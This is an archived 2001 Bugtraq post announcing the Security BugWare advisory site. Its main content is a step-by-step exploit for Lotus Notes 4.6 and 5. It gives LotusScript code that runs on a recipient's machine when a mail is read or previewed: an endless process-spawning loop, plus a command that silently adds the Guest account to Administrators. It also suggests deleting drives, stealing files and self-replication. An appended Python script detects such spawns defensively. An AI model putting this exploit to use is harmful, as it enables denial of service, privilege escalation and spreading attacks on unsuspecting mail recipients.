[22939] in bugtraq
Security BugWare Advisory
daemon@ATHENA.MIT.EDU (Yann)
Mon Oct 22 11:15:18 2001
Date: Mon, 22 Oct 2001 17:06:21 +0200
To: crv@oliver.efri.hr, bugtraq@securityfocus.com,
submissions@packetstormsecurity.org, info@razor.bindview.com
Message-ID: <20011022170621.A4302@bunker.freexion.net>
From: irib@bunker.freexion.net (Yann)
----[www.securitybugware.org]----
< A D V I S O R I E S >
Dear World,
From 1996 to 9th Sep 2001, Hrvoje Crvelin maintained the most explicit website
about bugs, exploits, and solutions. He decided to stop this project.
As there is no such resource on the web, we decided to keep this one alive.
Behind the new Security BugWare you can find a French organisation (association
loi 1901), which is a non-profit organisation. Our aim is to continue Hrvoje's
job, for all people like us who need to have a centralised - and straight to
the point - bug information page.
For the better propaganda of this news, we offer you an exclusive "Trick of
the Trade" :
Whacking A Machine With Lotus Notes Mail
COMMAND
Lotus Notes Client
SYSTEMS AFFECTED
Lotus Notes Client 5, all releases
Lotus Notes Client 4.6, all releases
PROBLEM
The SecurityBugware team found the following, as posted on www.securitybugware.org:
With a little LotusScript in your mail, you can execute anything you want on
the recipient's computer - even outside of Notes.
Follow these steps:
1) Create a new mail, add recipients
2) Go to the body and click in the menu "Create..Object"
3) Select "Control" and any object you please such as "ActiveXPlugin Object"
4) In Client 4.6, right click on the object to get "Properties".
   In Client 5, click on the new "Applet" feature in the menu, and go to
   "Properties".
   Then check "run the object when the document is read"
5) Then select "Edit events" : An event pane opens linked to the object
6) In the "Initialize" section Add the following code, where "My EMAIL"
is your Lotus Notes account name (if you get this part wrong, you'll
bomb yourself) :
    Sub Initialize
        Dim TaskId As Integer
        Dim session As New NotesSession
        ' Skip the sender's own account
        If session.CommonUserName<>"My EMAIL" Then
            ' Launch the calculator in an endless loop
            Do
                TaskId%=Shell("CALC.EXE",1)
            Loop
        End If
    End Sub
7) In the "Terminate" section, do the same :
    Sub Terminate
        Dim TaskId As Integer
        Dim session As New NotesSession
        ' Skip the sender's own account
        If session.CommonUserName<>"My EMAIL" Then
            ' Launch the calculator in an endless loop
            Do
                TaskId%=Shell("CALC.EXE",1)
            Loop
        End If
    End Sub
8) Click again on the "Initialize" section
9) Hit the "Send" button, enjoy ;-)
Your ActiveX (or other object you chose) gets executed during the reading
of the document. If the victim "previews" his mails without opening them...
no problem, he will die anyway because a preview counts as a reading.
In this example we just run the calculator in a loop, but there are
infinite possibilities like formatting hard drives, sending emails,
replicating the script to send it to the whole address book, sending files,
stealing files from the victim's hard drives without his noticing, etc.
For instance you could replace the Do .. Loop by :
TaskId%=Shell("CMD.EXE /C net localgroup " \"Administrators"\" /add guest ",1)
which silently adds the Guest account to the administrative group.
In a few words, Lotus Intranet is a giant backdoor in itself.
After some checks, it seems the SMTP gateway doesn't let LotusScript pass
through. You can only play inside your Notes interconnected domains.
SOLUTION
The only solution is to deactivate the preview, and to delete the memo
before reading it.
--
Security Bugware Team
Irib, Jitsu, Kiwi
www.securitybugware.org
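
Whatever payload the embedded script carries, the behaviour described above has one invariant a defender can watch for: the Notes client itself starts other programs, possibly in a tight loop. The following is an added example, not part of the original advisory, that flags this in process-creation records. The record layout, the thresholds and the client image names (notes.exe, nlnotes.exe) are assumptions to adapt to your own telemetry.

```python
from collections import defaultdict

# Assumption: image names of the Notes client process; confirm for your install.
NOTES_CLIENT_IMAGES = {"notes.exe", "nlnotes.exe"}
BURST_COUNT = 5       # this many children ...
BURST_WINDOW = 10.0   # ... within this many seconds counts as a spawn loop

# Constructed sample events, not real logs:
# (epoch seconds, host, parent image, child image, command line)
SAMPLE_EVENTS = [
    (1000.0, "ws01", "explorer.exe", "calc.exe", "calc.exe"),
    (1001.0, "ws02", "nlnotes.exe", "cmd.exe", "CMD.EXE /C net localgroup ..."),
] + [(2000.0 + i * 0.2, "ws03", "nlnotes.exe", "calc.exe", "CALC.EXE")
     for i in range(8)]


def find_notes_spawns(events):
    """Return (alerts, bursts): every child process started by the Notes
    client, and the hosts where the client started BURST_COUNT children
    inside BURST_WINDOW seconds (the Do..Loop pattern)."""
    alerts, times_by_host = [], defaultdict(list)
    for ts, host, parent, child, cmdline in sorted(events):
        if parent.lower() not in NOTES_CLIENT_IMAGES:
            continue
        alerts.append((host, child.lower(), cmdline))
        times_by_host[host].append(ts)
    bursts = set()
    for host, times in times_by_host.items():
        # Sliding window over sorted timestamps: compare each event with the
        # one BURST_COUNT - 1 positions earlier.
        for i in range(BURST_COUNT - 1, len(times)):
            if times[i] - times[i - BURST_COUNT + 1] <= BURST_WINDOW:
                bursts.add(host)
                break
    return alerts, sorted(bursts)


if __name__ == "__main__":
    alerts, bursts = find_notes_spawns(SAMPLE_EVENTS)
    for host, child, cmdline in alerts:
        print(f"notes client spawned {child} on {host}: {cmdline}")
    print("spawn-loop hosts:", bursts)
```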